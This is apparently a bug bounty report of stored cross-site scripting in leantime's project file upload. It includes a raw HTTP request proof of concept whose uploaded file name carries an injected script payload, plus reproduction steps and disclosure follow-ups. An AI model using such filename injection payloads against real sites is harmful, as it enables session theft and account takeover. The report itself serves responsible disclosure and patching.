Cross-site Scripting (XSS) - Stored in leantime/leantime
Valid
Reported on
Nov 1st 2021
Description
Stored XSS via filename when upload file
Proof of Concept
// PoC.req
POST /leantime/public//projects/showProject/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4148739525669256752671116272
Content-Length: 71553
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public//projects/showProject/3
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6IlJtckQrZ0FsM0ZDaFppZWNhZHhUNEE9PSIsInZhbHVlIjoiMm52ODQwMmlnTDBaU2RQelRoMWk3elBZdVlERS9UUVdOL2NBb24yVzJlTEl4cTNWejdkYUt0R1NPWlRIZDJrQk40dVdQM3BwbDRNenhmRWRGdWRPV1VuK2l6b251Tm1UVTJKR2cxcHJYV3d3ZmpuMHYvQU1CZ1BQNGtyWkJnRVMiLCJtYWMiOiJhZTlmOGVlYTNjODYxYjQ2ZmM1YjNlMWVhNTg4MzJhYTU1YmM2NzJhNjIwZjlhYjgxZTU1NmNmMDhiOGNmZGM3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9qYWZQcVpJZTF2QklNSjVMeHpFaXc9PSIsInZhbHVlIjoicTRxSndoNDdpRjBuYWxFVklaeFoxbEMvOFI2NW0zWExJcE81cDVBK1pkY3dXZEhNY1hXLzN5R0djelJURzA0bElWeC9zN1drQUlUUWZJaHN6eDNER1FDa3ZXdGZmSkJpWDNrN2lMMzV6Z2o2MmpMUGFpV0w3R01YM1FlbWVHeHgiLCJtYWMiOiJmYjFjNGE1YzM1ZDUwOWNiYWM2ZDQwYzVhMDMzY2IxZDRjNDk4NGNhODA2ZDRmZDZiMGJmMDlhMDMxYjM1YjFiIiwidGFnIjoiIn0%3D; sid=cecedc4236bbfb8d968f5370f8a42324fbb3ea99-89b8102536c949c0f917e83121e7b36ff776c8ef
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg
ÿØÿà�JFIF��`�`��ÿí
Photoshop 3.0�8BIMí
Resolution�����`�����`����8BIM
FX Global Lighting Angle�������x8BIMFX Global Altitude�������
8BIMó
Print Flags��� ���������8BIM
Copyright Flag������8BIM'Japanese Print Flags����
��������8BIMõColor Halftone Settings���H�/ff��lff�������/ff��¡�������2����Z���������5����-��������8BIMøColor Transfer Settings���p��ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè����ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè����ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè����ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè��8BIMGuides���������@��@����8BIM
URL overrides�������8BIMSlices����u�������������X�� ���
�U�n�t�i�t�l�e�d�-�2�������������������������������� ��X����������������������������������8BIMICC Untagged Flag����8BIMLayer ID Generator Base������8BIM
New Windows Thumbnail�� o������p���T��P��n@�� S��ÿØÿà�JFIF��H�H��ÿî�Adobe�d���ÿÛ��
-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="upload"
Upload
-----------------------------4148739525669256752671116272--
Step to Reproduct
Create file with name like: test'><img src=x onerror=alert(1)>xss.jpg
Goto Project Setting, choose to one project and at Files choose the file and upload
The XSS will trigger when upload success.
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
Occurrences
We have contacted a member of the
leantime
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
leantime
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
leantime
team.
We will try again in 10 days.
2 years ago
2 years ago
showProject.tpl.php#L104
has been validated
to join this conversation